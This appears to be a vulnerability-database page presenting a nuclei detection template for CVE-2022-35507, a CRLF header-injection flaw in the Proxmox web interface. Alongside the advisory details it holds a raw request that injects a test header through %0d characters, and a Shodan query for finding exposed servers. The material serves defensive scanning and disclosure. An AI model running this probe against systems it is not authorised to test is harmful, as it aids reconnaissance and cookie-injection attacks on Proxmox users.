Lucene search
K

Proxmox - CRLF Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

Proxmox Virtual Environment has a high severity CRLF injection vulnerability affecting cookies.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-35507
4 Dec 202222:39
circl
CNNVD
Proxmox pve-http-server 注入漏洞
4 Dec 202200:00
cnnvd
CVE
CVE-2022-35507
4 Dec 202200:00
cve
Cvelist
CVE-2022-35507
4 Dec 202200:00
cvelist
NVD
CVE-2022-35507
4 Dec 202219:15
nvd
OSV
CVE-2022-35507
4 Dec 202219:15
osv
Prion
Crlf injection
4 Dec 202219:15
prion
Positive Technologies
PT-2022-22874 · Proxmox +1 · Pve-Http-Server +3
4 Dec 202200:00
ptsecurity
RedhatCVE
CVE-2022-35507
9 Jan 202610:39
redhatcve
Vulnrichment
CVE-2022-35507
4 Dec 202200:00
vulnrichment
Rows per page
id: CVE-2022-35507

info:
  name: Proxmox - CRLF Injection
  author: DhiyaneshDk
  severity: high
  description: |
    A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.
  impact: |
    Attackers can inject response headers with CRLF characters to set malicious cookies in victims' Chromium-based browsers, causing client-side denial of service and potentially facilitating session fixation attacks on Proxmox users.
  remediation: |
    Update pve-http-server to version 4.1-3 or later that properly validates and strips CRLF characters from response headers.
  reference:
    - https://git.proxmox.com/?p=pve-http-server.git%3Ba=commitdiff%3Bh=936007ae0241811093155000486da171379c23c2
    - https://github.com/advisories/GHSA-xfgp-gpjw-wmqr
    - https://starlabs.sg/blog/2022/12-multiple-vulnerabilites-in-proxmox-ve--proxmox-mail-gateway/#bug-0x02-crlf-injection-in-response-headers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H
    cvss-score: 7.1
    cve-id: CVE-2022-35507
    cwe-id: CWE-74
    epss-score: 0.0138
    epss-percentile: 0.68792
    cpe: cpe:2.3:a:proxmox:proxmox_mail_gateway:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: proxmox
    product: proxmox_mail_gateway
    shodan-query: html:"Proxmox = {"
  tags: cve,cve2022,proxmox,crlf,vuln

http:
  - raw:
      - |
        GET /404%0dnew-header:value%0da: HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(all_headers, 'new-header:value')"
          - "status_code == 501"
        condition: and
# digest: 490a00463044022044121c2c325a05c289f8119026dda86151f4baded3ce5bc310ee90bf735d4500022036de07bb4460c4cfc1cff0e731e5e4ddd880a694ce17d807442f2976e1b6eb4d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.14.3 - 7.1
EPSS0.0138
SSVC
45